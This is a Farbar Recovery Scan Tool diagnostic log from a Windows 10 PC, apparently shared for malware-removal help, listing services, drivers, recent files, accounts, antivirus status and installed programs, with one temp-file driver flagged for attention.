CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2019-04-19]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [816184 2019-07-05] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3147344 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2914896 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-03-08] (Apple Inc. -> Apple Inc.)
S3 ArcService; C:\Program Files (x86)\Arc\ArcService.exe [123000 2019-04-16] (Perfect World Entertainment Inc. -> Perfect World Entertainment Inc)
S3 Astute Graphics Deployment Service; C:\Program Files (x86)\AstuteGraphics\AstuteManager\AGDeployment2.exe [2620320 2019-06-11] (Astute Graphics Limited -> )
R2 BDAuxSrv; C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe [803576 2019-12-18] (Bitdefender SRL -> Bitdefender)
R2 BDProtSrv; C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe [803576 2019-12-18] (Bitdefender SRL -> Bitdefender)
R2 bdredline; C:\Program Files\Common Files\Bitdefender\SetupInformation\Bitdefender RedLine\bdredline.exe [2195320 2018-03-22] (Bitdefender SRL -> Bitdefender)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8473200 2019-05-03] (BattlEye Innovations e.K. -> )
S2 brave; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [159368 2019-05-17] (Brave Software, Inc. -> BraveSoftware Inc.)
S3 bravem; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [159368 2019-05-17] (Brave Software, Inc. -> BraveSoftware Inc.)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\79.0.3945.10\remoting_host.exe [74392 2019-10-24] (Google LLC -> Google Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11345992 2019-11-28] (Microsoft Corporation -> Microsoft Corporation)
R2 DevMgmtService; C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe [119368 2019-11-14] (Bitdefender SRL -> Bitdefender)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [803440 2019-10-01] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\SocketHeciServer.exe [775904 2018-09-14] (Intel(R) Trust Services -> Intel(R) Corporation)
S2 Intel(R) TPM Provisioning Service; C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\TPMProvisioningService.exe [705760 2018-09-14] (Intel(R) Trust Services -> Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [218176 2018-11-16] (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [206472 2018-10-05] (Logitech Inc -> Logitech Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [6960640 2019-12-23] (Malwarebytes Inc -> Malwarebytes)
R2 nlsvc; C:\Program Files\Locktime Software\NetLimiter 4\NLSvc.exe [310272 2019-01-11] (Locktime Software s.r.o. -> Locktime Software)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2019-09-27] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2019-09-27] (NVIDIA Corporation -> NVIDIA Corporation)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1291888 2019-07-15] (Bitdefender SRL -> Bitdefender)
R2 RtkAudioUniversalService; C:\WINDOWS\System32\RtkAudUService64.exe [850512 2018-12-05] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5796168 2019-11-21] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 SlickVPNSrvc; C:\Program Files (x86)\SlickVPN\resources\bin\win32\slickvpnsrvc\slickvpnsrvc.exe [845252 2018-01-17] (SlickVPN) [File not signed]
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender Security\updatesrv.exe [151656 2019-12-18] (Bitdefender SRL -> Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe [803576 2019-12-18] (Bitdefender SRL -> Bitdefender)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1911.3-0\NisSrv.exe [3206472 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1911.3-0\MsMpEng.exe [103376 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [2236360 2019-05-10] (Wacom Technology Corporation -> Wacom Technology, Corp.)
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000 

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 atc; C:\WINDOWS\System32\DRIVERS\atc.sys [1693368 2019-11-18] (Bitdefender SRL -> Bitdefender S.R.L. Bucharest, ROMANIA)
R2 BdDci; C:\WINDOWS\System32\DRIVERS\bddci.sys [739264 2019-11-18] (Bitdefender SRL -> Bitdefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [22960 2019-04-17] (Microsoft Windows Early Launch Anti-malware Publisher -> Bitdefender)
R0 bdprivmon; C:\WINDOWS\System32\DRIVERS\bdprivmon.sys [46056 2019-09-02] (Bitdefender SRL -> © Bitdefender SRL)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [96448 2018-04-27] (Bitdefender SRL -> BitDefender)
R3 e1dexpress; C:\WINDOWS\System32\DriverStore\FileRepository\e1d68x64.inf_amd64_691712a04a41c1cd\e1d68x64.sys [568960 2018-11-21] (Intel(R) INTELND1820 -> Intel Corporation)
R0 Gemma; C:\WINDOWS\System32\DRIVERS\gemma.sys [564112 2019-11-18] (Bitdefender SRL -> BitDefender S.R.L. Bucharest, ROMANIA)
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [188384 2019-05-31] (Bitdefender SRL -> BitDefender LLC)
R2 Ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [196392 2019-09-02] (Bitdefender SRL -> Bitdefender)
S3 ladfGSS; C:\WINDOWS\system32\drivers\ladfGSS.sys [45168 2018-10-05] (Logitech Inc -> Logitech Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech -> Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2018-10-05] (Logitech Inc -> Logitech Inc.)
R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [216544 2019-12-23] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [20936 2019-12-23] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [278344 2019-12-24] (Malwarebytes Inc -> Malwarebytes)
R0 nldrv; C:\WINDOWS\System32\drivers\nldrv.sys [174336 2019-01-11] (Locktime Software s.r.o. -> Locktime Software)
S3 npcap; C:\WINDOWS\system32\DRIVERS\npcap.sys [78648 2019-08-30] (Insecure.Com LLC -> Insecure.Com LLC.)
R2 npf; C:\Windows\system32\drivers\npf.sys [36600 2018-07-27] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_ff72214788d99390\nvlddmkm.sys [22366088 2019-08-26] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-07-23] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [69840 2019-03-18] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [75600 2019-08-24] (NVIDIA Corporation -> NVIDIA Corporation)
U5 PROCMON24; C:\Windows\System32\Drivers\PROCMON24.sys [90168 2019-12-24] (Microsoft Windows Hardware Compatibility Publisher -> Sysinternals - www.sysinternals.com)
S3 tap-pia-0901; C:\WINDOWS\System32\drivers\tap-pia-0901.sys [38736 2018-08-27] (WDKTestCert kim,131775960494491927 -> The OpenVPN Project)
R3 tap0901; C:\WINDOWS\System32\drivers\tap0901.sys [27136 2018-01-17] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [610640 2019-01-14] (Bitdefender SRL -> Bitdefender)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [45664 2019-12-07] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [355760 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [54192 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
R1 YSDrv; C:\Program Files (x86)\Bignox\BigNoxVM\RT\YSDrv.sys [310536 2019-04-24] (Beijing Duodian Online Science and Technology Co.,Ltd -> BigNox Corporation)
S3 WinRing0_1_2_0; \??\C:\Users\saenz\AppData\Local\Temp\tmp53A7.tmp [X] <==== ATTENTION

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
5

FRST parte 2

==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-12-24 22:50 - 2019-12-24 22:51 - 000059871 _____ C:\Users\saenz\Desktop\FRST.txt
2019-12-24 22:49 - 2019-12-24 22:49 - 002271744 _____ (Farbar) C:\Users\saenz\Desktop\FRST64.exe
2019-12-24 19:29 - 2019-12-24 22:48 - 000000000 ____D C:\Users\saenz\Desktop\Reportes Escaneos
2019-12-24 17:41 - 2019-12-24 17:48 - 000001870 __RSH C:\ProgramData\ntuser.pol
2019-12-24 16:58 - 2019-12-24 16:58 - 000278344 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2019-12-24 16:10 - 2019-12-24 16:10 - 000000000 ____D C:\Users\saenz\Documents\Nueva carpeta (2)
2019-12-24 10:41 - 2019-12-24 10:42 - 049979392 _____ C:\atcperf.etl
2019-12-24 10:41 - 2019-12-24 10:42 - 018563072 _____ C:\atcuf.etl
2019-12-24 10:41 - 2019-12-24 10:42 - 002613248 _____ C:\atc.etl
2019-12-24 10:41 - 2019-12-24 10:42 - 000081920 _____ C:\atccore.etl
2019-12-24 10:41 - 2019-12-24 10:42 - 000073728 _____ C:\gemmacore.etl
2019-12-24 10:41 - 2019-12-24 10:42 - 000073728 _____ C:\gemma.etl
2019-12-24 10:41 - 2019-12-24 10:42 - 000073728 _____ C:\atccoreperf.etl
2019-12-24 10:41 - 2019-12-24 10:42 - 000008192 _____ C:\gemmauf.etl
2019-12-24 10:41 - 2019-12-24 10:42 - 000008192 _____ C:\atcufperf.etl
2019-12-23 21:37 - 2019-12-24 16:32 - 000090168 ____H (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCMON24.SYS
2019-12-23 21:34 - 2019-12-24 19:28 - 000000000 ____D C:\Users\saenz\Desktop\rkill
2019-12-23 21:11 - 2019-12-24 22:51 - 000000000 ____D C:\FRST
2019-12-23 20:53 - 2019-12-24 16:17 - 000000000 ____D C:\WINDOWS\Minidump
2019-12-23 20:53 - 2019-12-24 10:37 - 1476637998 _____ C:\WINDOWS\MEMORY.DMP
2019-12-23 20:48 - 2019-12-23 20:48 - 000216544 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys
2019-12-23 20:48 - 2019-12-23 20:48 - 000153312 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2019-12-23 20:48 - 2019-12-23 20:48 - 000002021 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-12-23 20:48 - 2019-12-23 20:48 - 000000000 ____D C:\Users\saenz\AppData\Local\mbamtray
2019-12-23 20:48 - 2019-12-23 20:48 - 000000000 ____D C:\Users\saenz\AppData\Local\mbam
2019-12-23 20:48 - 2019-12-23 20:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-12-23 20:48 - 2019-12-23 20:48 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-12-23 20:48 - 2019-12-23 20:47 - 000020936 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2019-12-23 20:46 - 2019-12-23 20:46 - 000000000 ____D C:\Program Files\Malwarebytes
2019-12-23 20:46 - 2019-12-23 20:46 - 000000000 ____D C:\AdwCleaner
2019-12-23 20:12 - 2019-12-21 06:14 - 000001873 _____ C:\Users\saenz\AppData\Google.js
2019-12-06 20:41 - 2019-12-23 20:37 - 000007596 _____ C:\Users\saenz\AppData\Local\Resmon.ResmonCfg
2019-12-04 19:49 - 2019-12-04 19:49 - 000072846 _____ C:\ProgramData\dm.update.1575514134.bdinstall.bin
2019-12-04 19:49 - 2019-12-04 19:49 - 000036403 _____ C:\ProgramData\dm.uninstall.1575514147.bdinstall.bin
2019-12-02 19:21 - 2019-12-04 21:00 - 000012764 _____ C:\Users\saenz\Documents\gastos.xlsx
2019-12-02 19:20 - 2019-12-02 19:20 - 000009430 _____ C:\Users\saenz\Documents\Libro1.xlsx
2019-12-02 15:29 - 2019-12-02 15:29 - 000065488 _____ (Adobe Systems Inc) C:\WINDOWS\system32\AdobePDF.dll
2019-12-02 15:29 - 2019-12-02 15:29 - 000036304 _____ (Adobe Systems Inc.) C:\WINDOWS\system32\AdobePDFUI.dll
2019-11-30 12:52 - 2019-12-23 20:53 - 000000000 ____D C:\Program Files\Mozilla Firefox

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-12-24 22:48 - 2019-11-21 02:02 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-12-24 22:48 - 2019-08-08 15:30 - 000000000 ____D C:\Users\saenz\Desktop\Nueva carpeta
2019-12-24 22:48 - 2019-03-18 21:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-12-24 22:07 - 2019-03-18 21:52 - 000000000 ____D C:\WINDOWS\system32\FxsTmp
2019-12-24 21:50 - 2019-04-17 21:22 - 000000000 ____D C:\Users\saenz\AppData\Roaming\vlc
2019-12-24 19:51 - 2019-06-04 11:43 - 000000000 ____D C:\Users\Public\Logi
2019-12-24 18:03 - 2019-03-18 21:37 - 000065536 _____ C:\WINDOWS\system32\config\ELAM
2019-12-24 17:43 - 2019-03-20 12:54 - 000000000 ____D C:\WINDOWS\system32\MRT
2019-12-24 17:41 - 2019-03-20 12:54 - 128443096 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2019-12-24 17:41 - 2019-03-18 21:37 - 000000000 ____D C:\WINDOWS\servicing
2019-12-24 17:41 - 2019-03-18 21:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-12-24 17:39 - 2018-09-15 00:33 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy
2019-12-24 17:08 - 2019-11-21 02:13 - 001767630 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-12-24 17:08 - 2019-03-19 04:49 - 000783276 _____ C:\WINDOWS\system32\perfh00A.dat
2019-12-24 17:08 - 2019-03-19 04:49 - 000152746 _____ C:\WINDOWS\system32\perfc00A.dat
2019-12-24 17:08 - 2019-03-18 21:50 - 000000000 ____D C:\WINDOWS\INF
2019-12-24 17:00 - 2019-03-18 21:52 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-12-24 17:00 - 2019-02-27 11:44 - 000000000 ____D C:\ProgramData\NVIDIA
2019-12-24 16:58 - 2019-11-21 02:10 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-12-24 16:58 - 2019-05-31 20:38 - 000000000 ____D C:\Users\saenz\AppData\Roaming\WTablet
2019-12-24 16:58 - 2019-03-18 21:37 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2019-12-24 16:58 - 2019-02-27 13:04 - 000000000 ____D C:\ProgramData\BDLogging
2019-12-24 16:17 - 2019-03-18 21:52 - 000000000 ___SD C:\WINDOWS\Downloaded Program Files
2019-12-24 16:17 - 2019-03-18 21:52 - 000000000 ___RD C:\WINDOWS\Offline Web Pages
2019-12-24 11:25 - 2019-07-10 18:57 - 000000000 ____D C:\Users\saenz\AppData\Local\Microsoft_Corporation
2019-12-24 10:51 - 2019-03-18 21:52 - 000000000 ___HD C:\Program Files\WindowsApps
2019-12-24 10:46 - 2019-10-03 10:23 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2019-12-24 10:42 - 2019-02-27 13:04 - 000000000 ____D C:\ProgramData\Bitdefender
2019-12-24 10:41 - 2019-02-27 12:45 - 000000000 ____D C:\Program Files\Bitdefender Agent
2019-12-24 10:37 - 2019-11-21 02:05 - 000000000 ____D C:\Users\saenz
2019-12-23 20:57 - 2019-06-05 22:59 - 000000000 ____D C:\Program Files\Cheat Engine 6.8.3
2019-12-23 20:53 - 2019-11-21 02:02 - 000455568 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2019-12-23 20:53 - 2019-07-01 22:33 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-12-23 20:48 - 2019-07-15 22:11 - 000000000 ____D C:\Users\saenz\AppData\Local\cache
2019-12-23 20:48 - 2019-03-18 21:52 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2019-12-23 20:18 - 2019-07-01 22:33 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2019-12-23 20:18 - 2019-04-20 23:14 - 000000000 ____D C:\Users\saenz\AppData\LocalLow\Mozilla
2019-12-23 20:01 - 2019-07-19 21:36 - 000000000 ____D C:\Users\saenz\AppData\Local\Warframe
2019-12-23 19:50 - 2019-10-09 13:43 - 000000762 _____ C:\Warframe.ini
2019-12-23 19:33 - 2019-04-19 18:08 - 000000000 ____D C:\Users\saenz\AppData\Local\CrashDumps
2019-12-23 15:47 - 2019-06-17 16:55 - 000000000 ____D C:\Users\saenz\AppData\Roaming\Telegram Desktop
2019-12-22 21:35 - 2019-04-18 17:13 - 000000000 ____D C:\Users\saenz\AppData\Roaming\Discord
2019-12-21 19:10 - 2019-08-08 15:21 - 000002499 _____ C:\Users\saenz\Desktop\Authy Desktop.lnk
2019-12-21 19:10 - 2019-08-08 15:21 - 000000000 ____D C:\Users\saenz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Twilio Inc
2019-12-21 19:10 - 2019-08-08 15:21 - 000000000 ____D C:\Users\saenz\AppData\Roaming\Authy Desktop
2019-12-21 19:10 - 2019-08-08 15:21 - 000000000 ____D C:\Users\saenz\AppData\Local\authy-electron
2019-12-21 19:09 - 2019-04-18 17:13 - 000000000 ____D C:\Users\saenz\AppData\Local\SquirrelTemp
2019-12-21 08:38 - 2019-08-14 19:00 - 000002504 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brave Nightly.lnk
2019-12-21 08:38 - 2019-08-14 19:00 - 000002463 _____ C:\Users\Public\Desktop\Brave Nightly.lnk
2019-12-21 05:10 - 2019-11-21 02:10 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2019-12-21 05:10 - 2019-04-18 10:57 - 000002469 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat DC.lnk
2019-12-19 20:49 - 2019-06-27 22:19 - 000000000 ____D C:\Users\saenz\AppData\Roaming\qBittorrent
2019-12-19 15:38 - 2019-05-17 18:33 - 000002416 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brave.lnk
2019-12-19 15:38 - 2019-05-17 18:33 - 000002375 _____ C:\Users\Public\Desktop\Brave.lnk
2019-12-18 18:52 - 2019-06-07 21:50 - 000000000 ____D C:\Users\saenz\AppData\Roaming\Twitch
2019-12-17 17:53 - 2019-02-27 11:27 - 000002299 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-12-17 17:53 - 2019-02-27 11:27 - 000002258 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-12-17 11:20 - 2019-07-25 17:27 - 000000000 ____D C:\Users\saenz\AppData\Roaming\SlickVPN
2019-12-14 20:26 - 2019-02-27 11:57 - 000000000 ____D C:\Program Files\Microsoft Office
2019-12-13 12:29 - 2019-11-21 02:10 - 000003558 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2019-12-13 12:29 - 2019-11-21 02:10 - 000003434 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2019-12-12 11:14 - 2019-02-27 12:19 - 000000877 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++.lnk
2019-12-12 11:14 - 2019-02-27 12:19 - 000000000 ____D C:\Users\saenz\AppData\Roaming\Notepad++
2019-12-12 00:00 - 2019-04-18 10:57 - 000002114 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat Distiller DC.lnk
2019-12-07 18:25 - 2019-02-27 10:09 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2019-12-05 23:39 - 2019-03-18 21:52 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2019-12-04 19:49 - 2019-02-27 13:04 - 000000000 ____D C:\Program Files\Bitdefender
2019-12-03 09:56 - 2019-11-20 22:47 - 000000000 ___DC C:\WINDOWS\Panther
2019-12-02 19:20 - 2019-02-27 11:24 - 000000000 ____D C:\Users\saenz\AppData\Local\PlaceholderTileLogoFolder
2019-12-02 18:53 - 2019-02-27 12:02 - 000000000 ____D C:\Users\saenz\AppData\Local\D3DSCache
2019-11-30 11:50 - 2019-09-08 21:31 - 000000000 ____D C:\Users\saenz\AppData\Local\JDownloader 2.0
2019-11-25 03:11 - 2019-11-21 02:10 - 000003380 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3305917012-4270169547-4029195171-1001
2019-11-25 03:11 - 2019-11-21 02:05 - 000002367 _____ C:\Users\saenz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-11-25 03:11 - 2019-02-27 11:24 - 000000000 ___RD C:\Users\saenz\OneDrive

==================== Files in the root of some directories ========

2019-06-28 17:49 - 2019-06-28 17:49 - 000000016 ____H () C:\Program Files (x86)\Common Files\cld2-astg
2019-06-28 17:50 - 2019-06-28 17:50 - 000000016 ____H () C:\Program Files (x86)\Common Files\dys2-astg
2019-06-28 17:50 - 2019-06-28 17:50 - 000000020 ____H () C:\Program Files (x86)\Common Files\inq1-astg
2019-06-28 17:50 - 2019-06-28 17:50 - 000000016 ____H () C:\Program Files (x86)\Common Files\ins1-astg
2019-06-28 17:50 - 2019-06-28 17:50 - 000000016 ____H () C:\Program Files (x86)\Common Files\mir1-astg
2019-06-28 17:51 - 2019-06-28 17:51 - 000000016 ____H () C:\Program Files (x86)\Common Files\pcs4-astg
2019-06-28 17:51 - 2019-06-28 17:51 - 000000016 ____H () C:\Program Files (x86)\Common Files\rst1-astg
2019-06-28 17:51 - 2019-06-28 17:51 - 000000016 ____H () C:\Program Files (x86)\Common Files\spl1-astg
2019-06-28 17:51 - 2019-06-28 17:51 - 000000016 ____H () C:\Program Files (x86)\Common Files\ssd2-astg
2019-06-28 17:51 - 2019-06-28 17:51 - 000000016 ____H () C:\Program Files (x86)\Common Files\sty1-astg
2019-06-28 17:57 - 2019-06-28 17:57 - 000000016 ____H () C:\Program Files (x86)\Common Files\txt1-astg
2019-06-28 17:57 - 2019-06-28 17:57 - 000000016 ____H () C:\Program Files (x86)\Common Files\vfa2-astg
2019-06-28 17:57 - 2019-06-28 17:57 - 000000016 ____H () C:\Program Files (x86)\Common Files\vs3-astg
2019-06-28 17:57 - 2019-06-28 17:57 - 000000016 ____H () C:\Program Files (x86)\Common Files\ws2-astg
2019-07-12 13:18 - 2019-07-12 13:57 - 000001456 _____ () C:\Users\saenz\AppData\Local\Adobe Save for Web 13.0 Prefs
2019-02-27 13:07 - 2019-02-27 13:07 - 000000410 _____ () C:\Users\saenz\AppData\Local\oobelibMkey.log
2019-06-27 21:57 - 2019-08-08 18:23 - 000000600 _____ () C:\Users\saenz\AppData\Local\PUTTY.RND
2019-12-06 20:41 - 2019-12-23 20:37 - 000007596 _____ () C:\Users\saenz\AppData\Local\Resmon.ResmonCfg
2019-04-19 17:00 - 2019-04-19 17:00 - 000000003 _____ () C:\Users\saenz\AppData\Local\updater.log
2019-04-30 22:51 - 2019-09-05 12:38 - 000000071 _____ () C:\Users\saenz\AppData\Local\update_progress.txt
2019-04-19 17:00 - 2019-04-19 17:00 - 000000425 _____ () C:\Users\saenz\AppData\Local\UserProducts.xml

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================
6

Addition

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24-12-2019 01
Ran by saenz (24-12-2019 22:51:40)
Running from C:\Users\saenz\Desktop
Windows 10 Pro Version 1903 18362.476 (X64) (2019-11-21 09:10:35)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrador (S-1-5-21-3305917012-4270169547-4029195171-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3305917012-4270169547-4029195171-503 - Limited - Disabled)
Invitado (S-1-5-21-3305917012-4270169547-4029195171-501 - Limited - Disabled)
saenz (S-1-5-21-3305917012-4270169547-4029195171-1001 - Administrator - Enabled) => C:\Users\saenz
WDAGUtilityAccount (S-1-5-21-3305917012-4270169547-4029195171-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AV: Bitdefender Antivirus (Disabled - Up to date) {0E17DB7D-A20F-62CE-B95B-17DB0CDFE318}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Bitdefender Antispyware (Enabled - Up to date) {B5763A99-8435-6D40-83EB-2CA97758A9A5}
FW: Bitdefender Firewall (Enabled) {362C5A58-E860-6396-9204-BEEEF20CA463}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Action! (HKLM-x32\...\Mirillis Action!) (Version: 3.9.6 - Mirillis)
Actualización de NVIDIA 38.0.2.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 38.0.2.0 - NVIDIA Corporation) Hidden
Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0C0F074E4100}) (Version: 19.021.20061 - Adobe Systems Incorporated)
Adobe After Effects 2019 (HKLM-x32\...\AEFT_16_1_1) (Version: 16.1.1 - Adobe Systems Incorporated)
Adobe Audition 2019 (HKLM-x32\...\AUDT_12_1) (Version: 12.1 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 4.9.0.504 - Adobe Systems Incorporated)
Adobe Illustrator 2019 (HKLM-x32\...\ILST_23_0_3) (Version: 23.0.3 - Adobe Systems Incorporated)
Adobe Lightroom Classic CC (HKLM-x32\...\LTRM_8_2_1) (Version: 8.2.1 - Adobe Systems Incorporated)
Adobe Media Encoder 2019 (HKLM-x32\...\AME_13_1) (Version: 13.1 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Adobe Premiere Rush CC (HKLM-x32\...\RUSH_1_0_3) (Version: 1.0.3 - Adobe Systems Incorporated)
Albion Online (HKLM-x32\...\SandboxAlbionOnline) (Version:  - Sandbox Interactive GmbH)
Apple Application Support (32 bits) (HKLM-x32\...\{9F7041CB-8398-4691-B8CB-0D52273BB3D9}) (Version: 7.4 - Apple Inc.)
